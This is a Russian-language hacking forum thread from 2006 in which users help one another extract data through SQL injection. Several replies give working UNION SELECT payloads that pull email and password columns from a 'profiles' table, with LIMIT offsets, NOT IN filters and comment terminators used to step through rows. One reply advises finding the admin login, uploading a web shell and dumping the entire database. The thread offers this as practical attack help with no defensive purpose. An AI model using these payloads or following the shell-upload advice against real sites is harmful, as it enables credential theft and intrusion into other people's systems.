ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с Sql
  #1  
Старый 16.11.2006, 21:06
Sov1et
Участник форума
Регистрация: 23.02.2006
Сообщений: 104
Провел на форуме:
176358

Репутация: 139
Отправить сообщение для Sov1et с помощью ICQ
По умолчанию Помогите с Sql

Есть скула такого рода :
union+select+1,2,3,4,email,pass+from+profiles+wher e+id=59745

Проблема в том что выводит скрипт тока по одной строке из базы и не получается вывести всё одновременно!+ id идут не по порядку. Как быть ???
 
Ответить с цитированием

  #2  
Старый 18.11.2006, 17:20
Alexkz
Новичок
Регистрация: 23.09.2006
Сообщений: 19
Провел на форуме:
142370

Репутация: 6
По умолчанию

Пробуй по строкам передвигаться с помощью limit!
Например
union+select+1,2,3,4,email,pass+from+profiles+wher e+id=59745+limit+0,1/*

union+select+1,2,3,4,email,pass+from+profiles+wher e+id=59745+limit+1,1/*

И т.д.
Должно помочь!
 
Ответить с цитированием

  #3  
Старый 19.11.2006, 17:29
jonart
Познающий
Регистрация: 06.04.2005
Сообщений: 53
Провел на форуме:
72540

Репутация: 19
Отправить сообщение для jonart с помощью ICQ
По умолчанию

Alexkz если я не ошибаюсь limit он просто ведь ограничивает вывод до определенного числа верно?
 
Ответить с цитированием

  #4  
Старый 19.11.2006, 17:53
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

union+select+1,2,3,4,email,pass+from+profiles+wher e+email+not+in('прошлое_полученно _значение')
 
Ответить с цитированием

  #5  
Старый 19.11.2006, 17:56
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

LIMIT FROM,COUNT - выдрать из результата COUNT строк, начиная с строки с номером FROM.
limit 0,1 - первая строка
limit 1,1 - вторая
limit 2,1 - третья
и т.п.
 
Ответить с цитированием

:(
  #6  
Старый 20.11.2006, 07:55
Alexkz
Новичок
Регистрация: 23.09.2006
Сообщений: 19
Провел на форуме:
142370

Репутация: 6
По умолчанию :(

Цитата:
Сообщение от jonart  
Alexkz если я не ошибаюсь limit он просто ведь ограничивает вывод до определенного числа верно?
К сожалению ошибаешься...
Читай, что написал _Great_!
 
Ответить с цитированием

  #7  
Старый 20.11.2006, 10:21
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

union+select+1,2,3,4,email,pass+from+profiles--
 
Ответить с цитированием

  #8  
Старый 20.11.2006, 17:19
jonart
Познающий
Регистрация: 06.04.2005
Сообщений: 53
Провел на форуме:
72540

Репутация: 19
Отправить сообщение для jonart с помощью ICQ
По умолчанию

Alexkz уже прочитал и понял что запарил над буит Мануал повторить ;-) а то что то последнее время вообще часто парить стал! =)
 
Ответить с цитированием

  #9  
Старый 20.11.2006, 17:24
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

ищи Админку и пасс логин админа =) потом попробуй залить шелл и вытащи базу целеком...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka E-Mail 1 17.09.2006 13:00
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ